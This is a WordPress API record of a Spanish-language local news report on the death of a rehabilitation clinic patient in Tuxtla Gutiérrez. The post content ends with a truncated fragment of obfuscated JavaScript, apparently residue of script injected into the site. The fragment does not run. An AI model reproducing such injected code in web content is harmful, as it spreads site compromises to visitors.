{"id":7502,"date":"2022-12-22T01:19:10","date_gmt":"2022-12-22T01:19:10","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7502"},"modified":"2022-12-22T01:19:11","modified_gmt":"2022-12-22T01:19:11","slug":"muere-interno-de-clinica-de-rehabilitacion","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7502","title":{"rendered":"Muere interno de cl\u00ednica de rehabilitaci\u00f3n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"577\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221221-WA0006-1024x577.jpg\" alt=\"\" class=\"wp-image-7503\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221221-WA0006-1024x577.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221221-WA0006-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221221-WA0006-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221221-WA0006-1536x865.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221221-WA0006.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 21 de diciembre del 2022. Tuxtla Guti\u00e9rrez.- Un interno de una cl\u00ednica de rehabilitaci\u00f3n localizada en el centro de Tuxtla Guti\u00e9rrez perdi\u00f3 la vida este martes por la noche.Los reportes oficiales, informaron que, fueron los mismos internos de la cl\u00ednica Juan Sabines, localizada en la S\u00e9ptima Sur, entre primera y segunda poniente,  los que reportaron que uno de los enfermos alcoh\u00f3licos no presentaba movimiento.Al lugar arribaron, param\u00e9dicos para realizar la revisi\u00f3n y determinaron que el hombre de unos 50 a\u00f1os ya hab\u00eda muerto.Al lugar arribaron polic\u00edas, y acordonaron el lugar.Peritos de la Fiscal\u00eda General del Estado arribaron al lugar para realizar las diligencias correspondientes levantar el cuerpo y trasladarlo al SEMEFO donde se practicar\u00eda la necropsia de ley.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 21 de diciembre del 2022. Tuxtla Guti\u00e9rrez.- Un interno de una cl\u00ednica de rehabilitaci\u00f3n localizada en el centro de Tuxtla Guti\u00e9rrez perdi\u00f3 la vida este martes por la noche.Los reportes oficiales, informaron que, fueron los mismos internos de la cl\u00ednica Juan Sabines, localizada en la S\u00e9ptima Sur, entre primera y segunda poniente, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7503,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-7502","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7502","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7502"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7502\/revisions"}],"predecessor-version":[{"id":7504,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7502\/revisions\/7504"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7503"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7502"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7502"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7502"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}